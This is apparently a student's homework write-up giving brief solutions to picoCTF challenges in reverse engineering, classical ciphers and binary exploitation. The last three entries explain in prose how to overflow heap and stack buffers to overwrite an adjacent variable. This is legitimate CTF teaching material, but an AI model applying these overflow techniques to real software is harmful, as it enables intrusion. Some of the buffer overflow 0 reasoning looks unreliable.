Cornell Cyber NME HW 3 - Fall 2024
This week's homework included solving a selection of the following picoCTF challenges.
vault-door-training [Reverse Engineering]
The flag is in the given source code. DO NOT hardcode secrets in your code.
Transformation [Reverse Engineering]
With the source code used to encode the string, it is certainly possible to reverse or brute-force a solution, but given the easy difficulty and hint to use online decoders, this seems out of scope. I used CyberChef's magic feature on intensive mode with the crib picoCTF and was given the flag.
file-run1 [Reverse Engineering]
The description tells us to run this file from the command line, but how do we do that? If you just try the name of the file that doesn't seem to work. To run a file like this, you instead have to do
console
./<file-name>
This won't work right away either. This is because this file does not have execute permissions, which can be confirmed by the lack of an x when you run
console
ls -l
To add execute permissions, you must run
console
chmod +x run
Now run should have the following permissions, -rwxr-xr-x , and can be executed. This is a good time to warn you that adding execute permissions to files you do not completely trust is a bad idea, there is a reason executing files is not allowed by default. With that in mind, you should now have the flag.
Mod 26 [Cryptography]
This is just a standard rot-13 encryption, CyberChef is a good bet as always.
Vigenere [Cryptography]
A vigenere cipher works by 'adding' the letters in the key to the input and repeating when you exhaust the key. CyberChef can do this.
transposition-trial [Cryptography]
Start by breaking the message into groups of three. Notice that the first word 'The' is scrambled such that the first letter is in position 3, the second letter is in position 1, and the third letter is in position 2. Follow this pattern to unscramble the remaining message.
heap 0 [Binary Exploitation]
The first thing I tried was simply connecting to the instance. I see some options available to be, notably the ability to write to a buffer. Seeing this I know there is a good chance I am looking to do a buffer overflow. Checking the source code I see that the win condition is if the second buffer safe_var != "bico". Doing some hexadecimal arithmetic, I see that two buffers are separated by 32 bytes. A char is a single byte, so entering 32 or more chars into the first array should overload it, spilling data into the second array. After writing a suitably large string, I see that the second buffer has been changed. I have now won, and the print flag option works.
heap 1 [Binary Exploitation]
The exploit here is the same as in heap 0, the only difference being that the win condition is now checking if safe_var = "pico". This just requires a slightly more careful input, we must insert 32 characters of filler text, followed by 'pico'. This satisfies the win condition and the flag can now be printed.
buffer overflow 0 [Binary Exploitation]
For this challenge, we again need to perform a buffer overflow. It is not as easy this time as we are not directly given addresses in the heap to consider. Looking at the source code, it can be seen there is a buffer 1 with size 100 created, then a buffer 2 with size 16 created. Later buff2 is compared with an input. From this, it can be determined that any input of length 116 where the first and last 16 characters are the same will satisfy the win condition.